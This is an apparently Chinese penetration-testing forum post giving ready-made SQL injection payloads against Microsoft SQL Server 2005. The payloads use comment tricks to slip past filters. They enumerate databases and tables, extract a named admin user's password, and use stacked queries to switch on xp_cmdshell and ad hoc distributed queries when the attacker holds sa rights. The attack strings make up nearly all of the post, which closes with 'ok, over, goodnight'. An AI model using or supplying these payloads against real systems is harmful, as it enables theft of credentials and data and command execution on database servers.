中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
, D/ x' B0 G& N4 t+ d) u
8 @5 ~% V* Z% W% T& r5 V0 z
8 C" H$ A/ I9 C9 a& j
[Copy to clipboard]CODE:
. Y1 P- b0 I3 U3 Q
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
5 n' i4 I4 g" b0 t* b- V6 W0 i6 p
8 R% k Q0 E" X1 M; j# R
爆表语句,somedb部份是所要列的数据库,红色数字1累加
5 d7 i$ Y7 `6 [! ^
/ F4 ]6 J" C9 v! w* D
1 C5 q# |0 o/ k& P1 s) I$ X' N
[Copy to clipboard]CODE:
5 c$ W/ i- x1 k; B3 Y% k$ L: }
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
$ _& v6 e5 K) N, J
9 F' L) t' k" P. L/ y
爆字段语句,爆表admin里user='icerover'的密码段
4 a {: ? a) {& u4 Z; d
8 W" U# t( n7 t+ W0 m7 y% Y8 W* N
' t7 ^6 g3 B& q7 |
[Copy to clipboard]CODE:
. ?& i% ]+ g3 m
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 w# d" f8 a( `$ z H
; L7 y, m4 R* I% ?0 F/ l) b
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
7 K3 u2 U. L! p: E; o+ F
如果是sa权限,可以这样来开启
- T' z1 H8 V) B" h0 v
开启openrowset
$ c2 Y* X# a+ l1 t) E' k' j
1 z$ l8 u9 E0 H
0 a' J3 g6 S' O# { D
[Copy to clipboard]CODE:
9 s' i! v3 Y2 s3 c: d% R1 L' F7 O- n
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
% C0 o1 O t8 r; a8 E) C! n0 D
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
, S3 H; @0 m- Y$ s4 e
6 `0 D) [8 S0 ^, T5 F' W) h
开启xp_cmdshell
: u" a S9 w: v0 z2 K& C
6 `: A0 j. j1 K* L
# w) E5 ]# u! `/ g. L9 K
[Copy to clipboard]CODE:
# X3 d- a1 E! s/ {, A# f, }2 ~
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
. Z! G0 F8 v2 `' [( p% e
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
* o+ v& K# w9 ?( T o
% Y6 P! o6 h7 Y: H, w
ok,over~~晚安
( p; x: W6 ]: [) s, H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2